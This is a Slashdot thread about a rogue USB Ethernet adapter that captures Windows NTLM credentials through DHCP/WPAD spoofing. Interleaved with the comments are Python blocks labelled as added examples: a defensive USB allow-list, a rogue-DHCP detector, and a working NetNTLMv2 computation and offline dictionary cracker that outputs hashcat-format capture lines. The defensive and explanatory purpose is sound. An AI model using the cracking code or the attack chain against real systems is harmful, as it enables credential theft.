Modified USB Ethernet Adapter Can Steal Windows and Mac Credentials (softpedia.com)
An anonymous reader writes from a report via Softpedia: An attacker can use a modified USB Ethernet adapter to fool Windows and Mac computers into giving away their login credentials. The attack relies on using a modified USB Ethernet adapter that runs special software, which tricks the attacked computer into accepting the Ethernet adapter as the network gateway, DNS, and WPAD server. The attack is possible because most computers will automatically install any plug-and-play (PnP) USB device. Even worse, when installing the new (rogue) USB Ethernet adapter, the computer will give out the local credentials needed to install the device. The custom software installed on the USB intercepts these credentials and logs them to an SQLite database. This attack can take around 13 seconds to carry out, and the USB Ethernet adapter can be equipped with an LED that tells the attacker when the login credentials have been stolen.
USB whitelisting (Score:5, Insightful)
This is why ALL of my USB devices are white listed on my computers.
There is no reason to allow rogue/unidentified hardware to be connected to a computer.
Re: USB whitelisting (Score:1)
Care to explain how?
Re: (Score:2, Informative)
Through udev rules on Linux and group policy under Windows.
Re: (Score:1)
Windows wise it'd be something like
Re: USB whitelisting (Score:4, Funny)
White listed... Here you go with your white superiority again. Always trying to keep the black man down
Re: (Score:1)
They're not. They have their own, it's called a blacklist.
Re: (Score:1)
not to nitpick...but "reverse racism" is just racism.
Nice! (Score:1)
How to protect? (Score:2)
Re: How to protect? (Score:1)
Set your computer on fire.
Re: (Score:3)
acetone also dissolves ABS, polycarbonate, polystyrene and other similar types of plastic. Better hope the USB port isn't made of those.
It's not too good for polyethylene either.
Re: (Score:2)
In windows, set the group policy so that USB devices are not automatically installed. Of course, you could also simply disable your USB hubs, but that may reduce the functionality of your PC beyond what you'd consider acceptable.
Re: (Score:3)
How can I protect my computer against that?
The best way is to not allow people to plug usb devices into your computer. Physical access trumps all.
Re: (Score:1)
Few links from a quick Google search
How to use Windows 7 to lock down removable media and keep your computer safe [microsoft.com]
Allow only known usb devices - Gentoo Wiki [gentoo.org]
See also Plug and Prey: Malicious USB Devices [irongeek.com]
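The "udev rules on Linux" answer above and the "do not automatically install USB devices" answer further down are the same deny-by-default policy. This is an added example, not code from the thread or from any of the linked pages: a small allow-list checker plus the udev rules it implies. Vendor/product IDs, serials and device descriptions are constructed; the only real pieces are the sysfs attribute names (`authorized_default` on root hubs, `authorized`, `idVendor`, `idProduct`, `serial`).

```python
"""Deny-by-default USB allow-list, as an added example (not from the thread).
Vendor/product IDs, serials and device descriptions below are constructed."""
from dataclasses import dataclass

# USB-IF interface class codes relevant here.
CDC_CONTROL, HID, MASS_STORAGE, CDC_DATA, VENDOR = 0x02, 0x03, 0x08, 0x0A, 0xFF


@dataclass(frozen=True)
class UsbDevice:
    vid: str              # idVendor as in sysfs/lsusb, 4 hex digits
    pid: str              # idProduct
    serial: str           # iSerialNumber string, "" if the device has none
    classes: frozenset    # bInterfaceClass of every interface it exposes


@dataclass(frozen=True)
class Allowed:
    vid: str
    pid: str
    serial: str           # "" = accept any serial for this vid:pid
    classes: frozenset    # interface classes this device is expected to have


# Constructed allow-list: one keyboard (any serial) and one specific Ethernet adapter.
ALLOW = [
    Allowed("046d", "c31c", "", frozenset({HID})),
    Allowed("0bda", "8153", "SN0001", frozenset({VENDOR})),
]


def check(dev: UsbDevice, allow=ALLOW) -> tuple[bool, str]:
    """Decide whether a freshly enumerated device may be authorized.

    Default is deny.  A device whose vid:pid is allow-listed is still refused
    if it presents interface classes the entry does not expect: a "keyboard"
    that also enumerates a CDC network interface is exactly the kind of
    device this thread is about.
    """
    for a in allow:
        if (a.vid, a.pid) != (dev.vid, dev.pid):
            continue
        if a.serial and a.serial != dev.serial:
            return False, f"serial mismatch for {dev.vid}:{dev.pid}"
        extra = dev.classes - a.classes
        if extra:
            return False, "unexpected interface classes " + ", ".join(f"0x{c:02x}" for c in sorted(extra))
        return True, "allow-listed"
    return False, f"{dev.vid}:{dev.pid} not on allow-list"


def udev_rules(allow=ALLOW) -> str:
    """Render the vid/pid/serial part of the policy as udev rules.

    The first rule sets authorized_default=0 on every root hub, so new
    devices are enumerated but stay unconfigured (no driver binds) until a
    later rule writes authorized=1.  Interface-class checks cannot be
    expressed in a vid/pid match; enforce them with check() (or a tool such
    as USBGuard) before authorizing.
    """
    lines = ['# Deny by default: root hubs (usb1, usb2, ...) own authorized_default',
             'ACTION=="add", SUBSYSTEM=="usb", KERNEL=="usb[0-9]*", ATTR{authorized_default}="0"']
    for a in allow:
        match = f'ATTR{{idVendor}}=="{a.vid}", ATTR{{idProduct}}=="{a.pid}"'
        if a.serial:
            match += f', ATTR{{serial}}=="{a.serial}"'
        lines.append(f'ACTION=="add", SUBSYSTEM=="usb", {match}, ATTR{{authorized}}="1"')
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Constructed devices: a real keyboard, a rogue Ethernet adapter on an unknown
    # vid:pid, and a device that claims the keyboard's vid:pid but also exposes CDC.
    for dev in (UsbDevice("046d", "c31c", "", frozenset({HID})),
                UsbDevice("1234", "abcd", "", frozenset({CDC_CONTROL, CDC_DATA})),
                UsbDevice("046d", "c31c", "", frozenset({HID, CDC_CONTROL, CDC_DATA}))):
        print(dev.vid + ":" + dev.pid, check(dev))
    print(udev_rules())
```

Two caveats a practitioner will hit: a udev rule only takes effect once udev has processed the root hub, so devices present at boot are authorized before the rule runs; the kernel parameter `usbcore.authorized_default=0` closes that window. And vid:pid:serial is whatever the device's firmware claims, so the allow-list limits the attack surface to impersonation of a known device rather than eliminating it.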
Start using SSL (Score:2)
Another alternative is to use proper cryptography between your machine and the necessary server.
I'm not that used to Windows and Active Domain, so I can't comment much.
The Unix equivalent would be to setup LDAPS for the credential validation instead of plain LDAP, with properly signed certificate.
The rogue credential server running inside the USB would fail the certificate validation and the workstation will refuse to use it.
Re: (Score:1)
I think Windows and *n*x are both sufficiently protected against simple network sniffing to make that a non-issue.
So I think this adapter does more than just snooping on what comes by - it must change the behavior of the OS in some way.
Re: (Score:2)
I think Windows and *n*x are both sufficiently protected against simple network sniffing to make that a non-issue. So I think this adapter does more than just snooping on what comes by - it must change the behavior of the OS in some way.
This made my day. Thanks for the laugh.
Not sniffing (Score:2)
I think Windows and *n*x are both sufficiently protected against simple network sniffing to make that a non-issue.
Unix: depends on configuration.
(goes from straight "everybody trust everyone else" like NIS and NFS servers, all the way up to Kerberos - everything is authenticated over an encrypted link)
(and the home variant: use SSH + keys for everything)
Windows:
I've read some very appalling descriptions of how it works.
No or not enough encryption.
So I think this adapter does more than just snooping on what comes by - it must change the behavior of the OS in some way.
According to the summary, the key redirects to a different (attacker-controlled) name server and Active Domain server (either running inside the USB adapter, or running elsewhere
Re: (Score:2)
Another alternative is to use proper cryptography between your machine and the necessary server.
The alternative is using authentication algorithms that don't suck. If Microsoft used a PAKE none of this would be possible. It's almost as if they are trying to get everyone hacked.
The Unix equivalent would be to setup LDAPS for the credential validation instead of plain LDAP, with properly signed certificate. The rogue credential server running inside the USB would fail the certificate validation and the workstation will refuse to use it.
LDAP is used for backend authentication of incoming authentication and authorization requests. A client connecting to another UNIX server is not connecting to LDAP it is connecting to that server using whatever authentication mechanism is offered by the protocol associated with the connection.
Regardless sending credentials in
Squints suspiciously... (Score:3)
Re: Squints suspiciously... (Score:5, Informative)
Bad article is bad. It initiates a man-in-the-middle attack for network requests.
On Windows, this gets NTLM for a pass-the-hash attack if a network share is mounted or set to automatically connect.
Rubby Ducky (Score:2)
This is essentially the Rubber Ducky dongle that's been used in Mr Robot. Esmail and his tech consultants don't invent stuff like that, so this must have been available for a while.
Re:Rubby Ducky (Score:4, Informative)
This is one reason why Qubes [qubes-os.com] keeps USB controllers cordoned off in a separate unprivileged VM.
Users have no idea about the many drivers and services that any ol' USB device can run on a system, not to mention the varying quality and vulnerabilities therein.
Re: (Score:2)
Sorry about the bad link. The correct one is https://www.qubes-os.org/ [qubes-os.org]
Re: (Score:2)
Not a Rubber Ducky, but a LAN Turtle built by the same people. While a Rubber Ducky is a microcontroller in a USB case that poses as a HID, the LAN Turtle is a SoC running openwrt crammed into a USB-Ethernet case.
Re:Rubby Ducky (Score:4, Informative)
Hak5.org (blocked from work, so no direct link) sells the Rubber Ducky and the Turtle (the actual device used in the attack). Rob (aka Mubix -- the guy documenting the hack) does a fair bit with Darren Kitchen, the main guy behind Hak5.
Also, Darren and Shannon (the co-hosts of Hak5) consulted on Mr. Robot.
https://www.youtube.com/watch?... [youtube.com]
Umm yea. (Score:3)
You can plug in a hardware device into a computer and it may communicate with it. Just as long as it tells the computer the correct response timely you can process the data sent to it in any way possible.
What may be just as easy is a pass-through USB connector where you plug your keyboard into one end. It will send keyboard data to the PC just fine. But log it and connect to a wireless network and send the data to different spots.
You can run all the system checks and not realize the keyboard extension cable is the actual hack.
Re: (Score:2)
When you plug in a USB device, you should get a pop-up asking if you want to access it in
Re: (Score:2)
Does that get you passwords, or anything, with encrypted home/user directory and a strong password?
Re: (Score:3)
I don't believe this runs arbitrary code on the computer, the only code that runs is the built-in usb-ethernet drivers.
The OS installs the adapter and sends DHCP requests through it. It responds with extra config options in the DHCP response telling it the URL to the web proxy configuration file. The OS then sends an authentication request to the configured web proxy. These are the credentials that get stolen. Windows will send out an NTLMv2 hashed password you then need to crack.
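The first half of the chain in the post above (DHCP reply carrying the proxy-configuration URL, then the PAC file that points at the "proxy") from the defender's side, as an added example that is not code from the thread or from the device's author. It encodes and parses the DHCP options field, pulls out option 252 (the WPAD URL), reports which roles the offering server claims for itself, and extracts the PROXY targets from a PAC script. The OFFER and the wpad.dat are constructed to mirror what the summary says the adapter hands out; the IP 192.168.1.1 and port 3128 are assumptions.

```python
"""Rogue-DHCP / WPAD detection, as an added example (not from the thread).
The DHCP OFFER and wpad.dat below are constructed."""
from __future__ import annotations
import re
import struct
from collections import defaultdict
from urllib.parse import urlparse

MAGIC = b"\x63\x82\x53\x63"          # DHCP options magic cookie (RFC 2132)
OPT_PAD, OPT_ROUTER, OPT_DNS, OPT_MSG_TYPE, OPT_WPAD, OPT_END = 0, 3, 6, 53, 252, 255
OFFER = 2


def encode_options(opts: list[tuple[int, bytes]]) -> bytes:
    """Serialise (code, value) pairs as the DHCP options field."""
    out = bytearray(MAGIC)
    for code, value in opts:
        assert len(value) <= 255, "split long options per RFC 3396"
        out += bytes([code, len(value)]) + value
    out.append(OPT_END)
    return bytes(out)


def parse_options(raw: bytes) -> dict[int, bytes]:
    """Parse the options field into {code: value}.

    Repeated codes are concatenated (RFC 3396).  A truncated option or a
    missing cookie raises rather than silently returning a partial view.
    """
    if raw[:4] != MAGIC:
        raise ValueError("missing DHCP magic cookie")
    opts = defaultdict(bytes)
    i = 4
    while i < len(raw):
        code = raw[i]
        if code == OPT_PAD:
            i += 1
            continue
        if code == OPT_END:
            return dict(opts)
        if i + 1 >= len(raw):
            raise ValueError("option header truncated")
        length = raw[i + 1]
        value = raw[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError(f"option {code} truncated")
        opts[code] += value
        i += 2 + length
    raise ValueError("no END option")


def ip(b: bytes) -> str:
    return ".".join(str(x) for x in b[:4])


def wpad_url(opts: dict[int, bytes]) -> str | None:
    """Option 252 as Windows-style servers send it (often with a trailing NUL)."""
    v = opts.get(OPT_WPAD)
    return v.rstrip(b"\x00").decode("ascii", "replace") if v else None


def roles_claimed(opts: dict[int, bytes], server_ip: str) -> set[str]:
    """Which of gateway / DNS / WPAD host the DHCP server assigns to itself.
    A legitimate home router is gateway+DNS; gateway+DNS+WPAD from a server
    that appeared with a new interface is the pattern described in the thread."""
    roles = set()
    if ip(opts.get(OPT_ROUTER, b"")) == server_ip:
        roles.add("gateway")
    if ip(opts.get(OPT_DNS, b"")) == server_ip:
        roles.add("dns")
    url = wpad_url(opts)
    if url and urlparse(url).hostname == server_ip:
        roles.add("wpad")
    return roles


def proxies_from_pac(pac: str) -> list[tuple[str, int]]:
    """Every PROXY host:port a PAC script can return."""
    return [(h, int(p)) for h, p in re.findall(r"PROXY\s+([\w.\-]+):(\d+)", pac)]


# Constructed OFFER from a 192.168.1.1 that is gateway, DNS and WPAD host at once.
ROGUE_OFFER = encode_options([
    (OPT_MSG_TYPE, bytes([OFFER])),
    (1, bytes([255, 255, 255, 0])),
    (OPT_ROUTER, bytes([192, 168, 1, 1])),
    (OPT_DNS, bytes([192, 168, 1, 1])),
    (OPT_WPAD, b"http://192.168.1.1/wpad.dat\x00"),
])

# Constructed wpad.dat: everything except plain hostnames goes through the "proxy".
ROGUE_PAC = """function FindProxyForURL(url, host) {
  if (isPlainHostName(host)) return "DIRECT";
  return "PROXY 192.168.1.1:3128; DIRECT";
}"""

if __name__ == "__main__":
    opts = parse_options(ROGUE_OFFER)
    print("WPAD URL:", wpad_url(opts))
    print("roles claimed by 192.168.1.1:", sorted(roles_claimed(opts, "192.168.1.1")))
    print("proxy targets:", proxies_from_pac(ROGUE_PAC))
```

On the host side the same chain is cut by turning off "Automatically detect settings" (WPAD) for the system proxy, since without it the client never fetches the PAC and never talks to the proxy that demands authentication; the parser above is for the network side, where a DHCP OFFER with option 252 from an unexpected server is a reasonable alert on its own.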
Re: (Score:3, Interesting)
or the device just sends an error response and then Windows sends out an NTLMv1 hash - and you don't NEED to crack it.
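The second half of the chain from the two posts above: what the NTLMv2 answer the client returns actually contains, what the capturing side writes down, and the offline guessing that "you then need to crack" means. This is an added example, not code from the thread or from the device's author; the user, domain, challenges, timestamp and passwords are constructed. MD4 is implemented inline because OpenSSL 3 only ships it in the legacy provider and `hashlib.new("md4")` fails on many systems.

```python
"""NetNTLMv2 as captured by a rogue proxy or DC, and the offline check a
cracker performs on it.  Added example, not from the thread; user, domain,
challenges and passwords are constructed."""
from __future__ import annotations
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, pure Python (see lead-in for why not hashlib)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[idx] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """The stored NT hash: MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """MS-NLMP NTOWFv2: HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr, the 16 bytes the server actually verifies."""
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def make_blob(timestamp: int, client_challenge: bytes, target_name: str) -> bytes:
    """The 'temp' structure the client signs: version, time, client nonce, AV pairs."""
    av = struct.pack("<HH", 2, len(target_name) * 2) + target_name.encode("utf-16-le") + struct.pack("<HH", 0, 0)
    return b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge + b"\x00" * 4 + av + b"\x00" * 4


def hashcat_5600(user: str, domain: str, server_challenge: bytes, proof: bytes, blob: bytes) -> str:
    """The line a capturing server logs; hashcat -m 5600 consumes it directly."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(line: str, wordlist) -> str | None:
    """Offline dictionary attack on one captured line: one MD4 and two HMAC-MD5 per guess."""
    user, _, domain, chal, proof, blob = line.split(":")
    chal_b, proof_b, blob_b = bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)
    for guess in wordlist:
        if hmac.compare_digest(nt_proof(guess, user, domain, chal_b, blob_b), proof_b):
            return guess
    return None


def demo() -> tuple[str, str | None]:
    """Constructed capture: the rogue server picks the challenge, the client answers."""
    server_challenge = bytes.fromhex("1122334455667788")   # chosen by the attacker's server
    blob = make_blob(0x01D1F7C4A6B2E800, bytes.fromhex("0f1e2d3c4b5a6978"), "EVIL")
    proof = nt_proof("Winter2016", "alice", "CORP", server_challenge, blob)
    line = hashcat_5600("alice", "CORP", server_challenge, proof, blob)
    return line, crack(line, ["letmein", "hunter2", "Winter2016", "Password1"])


if __name__ == "__main__":
    captured, recovered = demo()
    print(captured)
    print("recovered:", recovered)
```

Two things the code makes concrete. The captured value is a keyed MAC over a server-chosen challenge, not the NT hash itself, so it cannot be replayed or passed-the-hash; it is only useful after the password is guessed, and a long random password never falls. The NTLMv1 case in the reply above is different in kind: there the response is DES of the challenge under the NT hash, so with a fixed challenge the NT hash itself can be looked up rather than guessed, and that hash is what pass-the-hash needs.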
Re: (Score:2)
I really don't see why windows can't ask before installing ANYTHING from usb. Clicking "OK" is not that big a deal relative to the effort of plugging in a usb device.
Re: (Score:2)
Because realistically most people are pretty dumb when it comes to using a computer. Autorun is a thing because otherwise more than half of computer users would never be able to launch a program.
That's why we have consistent UI's getting thrown out of the window and now most app developers are basically going with the approach of "throw everything randomly up in their face and hopefully they'll see a button that does what they want". Makes it easier for the average idiot to stumble upon what they want - m
Be afraid (Score:2)
Re: Bullshit - Neither OS X or Windows work that w (Score:1)
says the person who has one of these things that does work
Re: (Score:3)
Windows doesn't provide the USB dongle with a password at any point, as implied by the article. It 'auto-installs' signed drivers already on the PC or if configured, downloads them from the internet ... SIGNED DRIVERS ... SIGNED BY MICROSOFT. Not just any random driver on the USB device.
Windows does not do 'auto-run'
OS X doesn't do anything implied in this article either. If it doesn't have a driver for your USB device already, it just doesn't work; with the exception of printers, there isn't a magic way that it reads drivers from the USB device or random internet sites.
This story is simply bullshit.
Yea TFA is worthless and does not disclose anything of relevance. This isn't about USB or device drivers. It is about getting windows to automatically do stupid crap over a network like trying to login to something. The IE Advanced option for example "Enabled Integrated Windows Authentication" is I believe enabled by default in at least Windows 7.
If you can get a browser or some internal service to attempt login by initial DHCP/WPAD/whatever you can make short work of the authentication attempt to derive
Re: (Score:2)
how is this any different than say, a modified router? Or a computer acting as a gateway? Is this device just intercepting unencrypted network traffic? Like any point on the internet can?
That would be no more earth-shattering than hearing that someone found a way to read my postal mail.
If you want privacy, you should be using end-to-end network encryption of some sort. Be it VPN, pgp email, ssh, etc. If you're sending in the clear and trusting every member of a huge network of random actors between you
Re: (Score:2)
If you're sending in the clear and trusting every member of a huge network of random actors between you and your destination, you're stupid.
This is exactly what Microsoft is enabling today in 2016 with "integrated authentication".... Apparently a sufficient number of people have not taken the opportunity to tell them how stupid they are.
There are some small caveats but none of them matter. The passwords aren't set in the clear but might as well be given the ease of deriving them from challenge material.
Re: (Score:2)
Windows will actually happily and by default send the credentials in clear text over wireless if you're using 802.1x without a Windows approved RADIUS server. The article and the summary is dumb because no USB device gets credentials by plugging it in. This is probably a network attack and could be done anywhere on a network.
Re: (Score:1)
This is simply bullshit.
Yeah, exactly like you 'working at a carrier'.
Re:Bullshit - Neither OS X or Windows work that wa (Score:5, Informative)
The USB device pretends to be an Ethernet adapter. Once the adapter is installed, the PC attempts to communicate with the network. The other portion of the box is running code that will automatically respond as if it's a domain controller so that Windows will attempt to authenticate using the existing credentials. This request includes the password hash. The software responds "thanks for the hash!". Unplug everything and go home to break the hash on your own time.
The OS isn't running any software from the device, the device is just taking advantage of the default behavior (authenticate to the new network).
Re: (Score:1)
It's bitztream, the autism-hating Slashdot troll!
doesn't have to be an adapter (Score:2)
This kind of attack could run on any USB device with a modified firmware (e.g. memory stick). If you don't want to hack an existing USB device, then for a few bucks you can make your own. It also doesn't have to interfere with the original functionality of the USB device, so if you aren't paying attention, the device could perform its task undetected.
I wonder if it works without a logged session (Score:2)
How can I get one? (Score:2)
Seriously sick of trying to deal with customers who forgot their own damn passwords. This would be a godsend!
Now with convenient red LED! (Score:1)